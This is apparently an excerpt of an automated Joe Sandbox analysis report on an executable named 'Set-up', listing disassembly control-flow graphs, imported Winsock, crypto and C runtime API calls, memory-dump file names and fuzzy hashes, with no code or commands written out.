1017 b2ae14-b2ae17 1016->1017 1018 b2ae1a-b2ae1c call b2af70 1016->1018 1017->1018 1022 b2ae21-b2ae23 1018->1022 1021->964 1023 b2ae93-b2ae9d 1022->1023 1024 b2ae25-b2ae27 1022->1024 1025 b2aeaf-b2aeb1 call b1e760 1023->1025 1026 b2ae9f-b2aea6 call b1e7c0 1023->1026 1024->964 1030 b2aeb6-b2aebe 1025->1030 1026->1030 1031 b2aec0-b2aedb call b1e180 1030->1031 1032 b2af1a-b2af1f 1030->1032 1031->964 1035 b2aee1-b2aeec 1031->1035 1032->964 1036 b2af02-b2af06 1035->1036 1037 b2aeee-b2aeff 1035->1037 1038 b2af08-b2af0b 1036->1038 1039 b2af0e-b2af15 1036->1039 1037->1036 1038->1039 1039->955
                          APIs
                          • htons.WS2_32(?), ref: 00B2AAE8
                          • htons.WS2_32(?), ref: 00B2AB33
                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00B2AB9A
                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00B2ABE3
                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00B2AC02
                          • setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 00B2AC29
                          • htonl.WS2_32(00000000), ref: 00B2AC69
                          • bind.WS2_32(?,00000017,0000001C), ref: 00B2ACCF
                          • setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 00B2ACFE
                          • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 00B2AD20
                          • WSAGetLastError.WS2_32 ref: 00B2ADB5
                          • closesocket.WS2_32(?), ref: 00B2AE6F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
                          • String ID:
                          • API String ID: 4039825230-0
                          • Opcode ID: 6dba0d8dc828f5f52fac91b853a2ec1b9d38333cef15799408af9be2c5eb1bc2
                          • Instruction ID: 3762e06595c25df223abb8158c6e06e268e397b6952a98a16ff43685a045c009
                          • Opcode Fuzzy Hash: 6dba0d8dc828f5f52fac91b853a2ec1b9d38333cef15799408af9be2c5eb1bc2
                          • Instruction Fuzzy Hash: 5EE1DF706003119FEB20DF24E885B6AB7E5FF88310F144A6CF99D9B291D775E845CB92

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1041 a6116c-a6118a 1042 a61430-a61439 GetStartupInfoA 1041->1042 1043 a61190-a611a1 1041->1043 1047 a61448-a6145d _cexit 1042->1047 1044 a611bc-a611c8 1043->1044 1045 a611ca-a611d4 1044->1045 1046 a611a8-a611aa 1044->1046 1050 a613e3-a613f7 call de8a20 1045->1050 1051 a611da-a611e1 1045->1051 1048 a613d0-a613dd 1046->1048 1049 a611b0-a611b9 Sleep 1046->1049 1048->1050 1048->1051 1049->1044 1055 a611ff-a61201 1050->1055 1056 a613fd-a6141d _initterm 1050->1056 1052 a611e7-a611f9 1051->1052 1053 a61460-a61479 _initterm 1051->1053 1052->1055 1052->1056 1058 a61483 1053->1058 1059 a61207-a6120e 1055->1059 1060 a61423-a61429 1055->1060 1056->1059 1056->1060 1063 a6148a-a61499 exit 1058->1063 1061 a61210-a61229 1059->1061 1062 a6122c-a6126c call de93e0 SetUnhandledExceptionFilter _set_invalid_parameter_handler call de9210 __p__acmdln 1059->1062 1060->1059 1061->1062 1069 a61281-a61287 1062->1069 1070 a6126e 1062->1070 1072 a61270-a61272 1069->1072 1073 a61289-a61294 1069->1073 1071 a612bd-a612c5 1070->1071 1074 a612c7-a612d0 1071->1074 1075 a612db-a612fa malloc 1071->1075 1076 a61274-a61277 1072->1076 1077 a612b8 1072->1077 1078 a6127e 1073->1078 1079 a612d6 1074->1079 1080 a613c0-a613c4 1074->1080 1075->1058 1081 a61300-a61311 1075->1081 1082 a612a0-a612a2 1076->1082 1083 a61279 1076->1083 1077->1071 1078->1069 1079->1075 1080->1079 1084 a61318-a6134c strlen malloc memcpy 1081->1084 1082->1077 1085 a612a4 1082->1085 1083->1078 1084->1084 1086 a6134e-a6139b call de9060 call f44030 1084->1086 1087 a612a8-a612b1 1085->1087 1086->1063 1093 a613a1-a613a9 1086->1093 1087->1077 1089 a612b3-a612b6 1087->1089 1089->1077 1089->1087 1093->1047 1094 a613af-a613ba 1093->1094
                          APIs
                          • Sleep.KERNEL32 ref: 00A611B7
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00A61238
                          • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6124D
                          • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A61261
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344
                          • GetStartupInfoA.KERNEL32 ref: 00A61433
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                          • String ID:
                          • API String ID: 3873122205-0
                          • Opcode ID: 035f91d6c525616a9aafa289408d00c5562ea016eefde407ab4501c6d760e707
                          • Instruction ID: df948e15d87db4366d08725c3ed760801a72c15934ccd9986af9b844f57220c9
                          • Opcode Fuzzy Hash: 035f91d6c525616a9aafa289408d00c5562ea016eefde407ab4501c6d760e707
                          • Instruction Fuzzy Hash: C281CDB1904345CFDB20EF66D4853AABFF0FB45300F18492CE9899B345DB3AA844DBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1202 de8e90-de8eb8 _open 1203 de8eff-de8f2c call de9f70 1202->1203 1204 de8eba-de8ec7 1202->1204 1211 de8f39-de8f51 _write 1203->1211 1206 de8ec9 1204->1206 1207 de8ef3-de8efa _exit 1204->1207 1209 de8ecb-de8ecd 1206->1209 1210 de8ee2-de8ef1 1206->1210 1207->1203 1212 f46a10-f46a27 1209->1212 1213 de8ed3-de8ed6 1209->1213 1210->1206 1210->1207 1214 de8f53-de8f5e _close 1211->1214 1215 de8f30-de8f37 1211->1215 1216 f46a29 1212->1216 1217 f46a2a-f46a5f CryptAcquireContextA 1212->1217 1213->1210 1218 de8ed8 1213->1218 1214->1204 1215->1211 1215->1214 1219 f46a61-f46a6f 1217->1219 1220 f46a79-f46a9b CryptGenRandom 1217->1220 1218->1210 1221 f46a75-f46a78 1219->1221 1222 f46aa6-f46abb CryptReleaseContext 1220->1222 1223 f46a9d-f46aa4 1220->1223 1222->1219 1223->1222 1224 f46abd-f46ad2 CryptReleaseContext 1223->1224 1224->1221
                          APIs
                          • _open.MSVCRT ref: 00DE8EAD
                          • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DE8EFA
                          • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DE8F4A
                          • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DE8F59
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _close_exit_open_write
                          • String ID: terminated$@$CONOUT$
                          • API String ID: 28676597-491099378
                          • Opcode ID: 4c2c2e45225a33993be3506e050377ac340b9f7bbc4a739da77872d8c87391c1
                          • Instruction ID: 8fb3e695837739814c19f60a5285443ddf083fb4e188bb7ca3a9122997872dbc
                          • Opcode Fuzzy Hash: 4c2c2e45225a33993be3506e050377ac340b9f7bbc4a739da77872d8c87391c1
                          • Instruction Fuzzy Hash: 494145B09083458FCB10EF79C44566EBBF0BF48714F048A2DE899D7240EB39C845DB66

                          Control-flow Graph

                          Strings
                          • error CryptGenRandom 0x%08lx, xrefs: 00F3C1E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: error CryptGenRandom 0x%08lx
                          • API String ID: 0-1222942552
                          • Opcode ID: 182e204e55165b15b438c3ba3b095e8e603e008757f868be3c714021ec8dceb0
                          • Instruction ID: 973eaed2c0f545cf0da9bb9220692e9d75966a9c544d1e0213550d7bf6b5f2eb
                          • Opcode Fuzzy Hash: 182e204e55165b15b438c3ba3b095e8e603e008757f868be3c714021ec8dceb0
                          • Instruction Fuzzy Hash: E941C2B59093419FC700EF78C58A61ABBE0BB88324F408A2DE8C9C7354EB79D545DF92

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1246 a705b0-a705b7 1247 a707ee 1246->1247 1248 a705bd-a705d4 1246->1248 1249 a707e7-a707ed 1248->1249 1250 a705da-a705e6 1248->1250 1249->1247 1250->1249 1251 a705ec-a705f0 1250->1251 1252 a707c7-a707cc 1251->1252 1253 a705f6-a70620 call a77350 call a670b0 1251->1253 1252->1249 1258 a70622-a70624 1253->1258 1259 a7066a-a7068c call a9dec0 1253->1259 1261 a70630-a70655 call a670d0 call a703c0 call a77450 1258->1261 1264 a707d6-a707e3 call a77380 1259->1264 1265 a70692-a706a0 1259->1265 1292 a707ce 1261->1292 1293 a7065b-a70668 call a670e0 1261->1293 1264->1249 1267 a706f4-a706f6 1265->1267 1268 a706a2-a706a4 1265->1268 1273 a707ef-a7082b call a73000 1267->1273 1274 a706fc-a706fe 1267->1274 1271 a706b0-a706e4 call a773b0 1268->1271 1271->1264 1291 a706ea-a706ee 1271->1291 1285 a70831-a70837 1273->1285 1286 a70a2f-a70a35 1273->1286 1279 a7072c-a70754 1274->1279 1281 a70756-a7075b 1279->1281 1282 a7075f-a7078b getsockopt 1279->1282 1287 a70707-a70719 WSAEventSelect 1281->1287 1288 a7075d 1281->1288 1289 a70791-a70796 1282->1289 1290 a70700-a70703 1282->1290 1298 a70861-a7087e WSAWaitForMultipleEvents 1285->1298 1299 a70839-a70842 call a76fa0 1285->1299 1296 a70a37-a70a3a 1286->1296 1297 a70a3c-a70a52 1286->1297 1287->1264 1294 a7071f 1287->1294 1300 a70723-a70726 1288->1300 1289->1290 1301 a7079c-a707c2 call a676a0 1289->1301 1290->1287 1291->1271 1302 a706f0 1291->1302 1292->1264 1293->1259 1293->1261 1294->1300 1296->1297 1297->1264 1304 a70a58-a70a81 call a72f10 1297->1304 1307 a70882-a7088d 1298->1307 1309 a70847-a7084c 1299->1309 1300->1273 1300->1279 1301->1290 1302->1267 1304->1264 1320 a70a87-a70a97 call a76df0 1304->1320 1311 a70893-a708b1 1307->1311 1312 a70970-a70975 1307->1312 1316 a70852 1309->1316 1317 a70a9c-a70aa4 1309->1317 1318 a708c8-a708f7 WSAEnumNetworkEvents 1311->1318 1313 a7097b-a70989 call a670b0 1312->1313 1314 a70a19-a70a2c WSAResetEvent 1312->1314 1313->1314 1329 a7098f-a7099e 1313->1329 1314->1286 1316->1298 1321 a70854-a7085f 1316->1321 1317->1264 1322 a708fd-a70925 1318->1322 1323 a708f9-a708fb 1318->1323 1320->1264 1321->1307 1324 a70928-a7093f WSAEventSelect 1322->1324 1323->1324 1327 a70945-a7096b 1324->1327 1328 a708b3-a708c2 1324->1328 1327->1328 1328->1312 1328->1318 1331 a709b0-a709c1 call a670d0 1329->1331 1334 a709c3-a709c7 1331->1334 1335 a709a0-a709ae call a670e0 1331->1335 1337 a709e8-a70a03 WSAEnumNetworkEvents 1334->1337 1335->1314 1335->1331 1338 a70a05-a70a17 1337->1338 1339 a709d0-a709e6 WSAEventSelect 1337->1339 1338->1339 1339->1335 1339->1337
                          APIs
                          • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00A70711
                          • getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00A70783
                          • WSAWaitForMultipleEvents.WS2_32(00000001,00A63EBE,00000000,00000000,00000000), ref: 00A7086F
                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00A708EF
                          • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00A70934
                          • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00A709DC
                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00A709FB
                          • WSAResetEvent.WS2_32(8508C483), ref: 00A70A1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
                          • String ID: multi.c
                          • API String ID: 3264668090-214371023
                          • Opcode ID: e58075a2cd3eb28331a788edc63a9df11cc62179ee85725016a27ec0e53ef1e7
                          • Instruction ID: 806f389251b8dbccfe63d17bb6a7068b02a11a00f9ac7fe40e5fcfc3c8d5b901
                          • Opcode Fuzzy Hash: e58075a2cd3eb28331a788edc63a9df11cc62179ee85725016a27ec0e53ef1e7
                          • Instruction Fuzzy Hash: 49D19A71608301DFE710DF24DD81BABBBE9BB94348F04C82CF98986252E775E944CB52
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 879cba4e2c886749113cb35436a44a741d2879e4a93db3eda7750a977e32c941
                          • Instruction ID: 10b3e61a1053f0265db4dfc21436dc8f742a31fb6055d908a564a9345980e51a
                          • Opcode Fuzzy Hash: 879cba4e2c886749113cb35436a44a741d2879e4a93db3eda7750a977e32c941
                          • Instruction Fuzzy Hash: D491DD306083498BD7359B298C84BBEB2E5FF84360F14CB2CE8AD861E5EB759C41D691
                          APIs
                          • Sleep.KERNEL32 ref: 00A611B7
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00A61238
                          • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6124D
                          • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A61261
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344
                          • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6140C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                          • String ID:
                          • API String ID: 1209083157-0
                          • Opcode ID: 79b13d4ad7231d843d04333387a740eb65b2fc1aed8b6e807683d538d15cab9c
                          • Instruction ID: fe9b89ba407b91f303f5593c2116105d3ceab6afa0b839c730d712d67315bacf
                          • Opcode Fuzzy Hash: 79b13d4ad7231d843d04333387a740eb65b2fc1aed8b6e807683d538d15cab9c
                          • Instruction Fuzzy Hash: EB417BB0A05305CFDB20EF66E48535DBBF0FB48300F08492DE8899B345DB7AA844DBA1
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00A61238
                          • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6124D
                          • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A61261
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344
                            • Part of subcall function 00DE8A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00A613EF), ref: 00DE8A2A
                          • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6140C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                          • String ID:
                          • API String ID: 2715571461-0
                          • Opcode ID: 7e3d2fc00709fbe6d2d3909489eed4b08654339727e779d147a13c1b212f68b4
                          • Instruction ID: fcea834c607ed9a32089c1ec03abd407406671127039a99e370f0cbeaa25c2d2
                          • Opcode Fuzzy Hash: 7e3d2fc00709fbe6d2d3909489eed4b08654339727e779d147a13c1b212f68b4
                          • Instruction Fuzzy Hash: 894169B0905345CFDB20EF66E48535DBBF0FB48300F14492DE9999B345DB3AA844DB61
                          APIs
                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 00B2B2B6
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(cur != NULL,ares__sortaddrinfo.c,000001A4,?,?,00000000,0000000B,?,?,00B13C41,00000000), ref: 00B2B3F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
